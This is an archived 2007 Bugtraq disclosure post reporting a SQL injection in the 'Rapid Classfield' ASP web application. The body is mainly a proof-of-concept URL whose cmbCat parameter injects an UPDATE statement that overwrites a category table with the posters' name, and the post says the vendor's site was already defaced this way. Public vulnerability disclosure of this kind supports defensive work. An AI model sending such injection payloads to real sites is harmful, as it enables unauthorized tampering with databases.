Aria-Security.Net Research: Request For Travel Sql Injection

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Aria-Security.Net Research: Request For Travel Sql Injection
From: Advisory@xxxxxxxxxxxxxxxxx, no-reply@xxxxxxxxxxxxxxxxx
Date: 8 Nov 2007 02:31:52 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Aria-Security Team,
http://Aria-Security.net
-------------------------------
Rapid Classfield SQL Injection
Shout Outs: AurA, imm02tal
Vendor: http://www.lotfian.com/UK/PORTALS.asp

http://target/agencyCatResult.asp?cmbCat='%20UPDATE%20rftCategory%20set%20Category%20=%20'Aria-Security
 Team';--

The Vendor's website has been attacked by Emperor Team via this vuln.


Regards,
The-0utl4w
>From Aria-Security.Net

Prev by Date: Re: iDefense Security Advisory 11.07.07: Oracle 10g R2 PITRIG_DROPMETADATA Buffer Overflow Vulnerability
Next by Date: Simple Machine Forum - Private section/posts/info disclosure
Previous by thread: [ GLSA 200711-10 ] Mono: Buffer overflow
Next by thread: Simple Machine Forum - Private section/posts/info disclosure
Index(es):
- Date
- Thread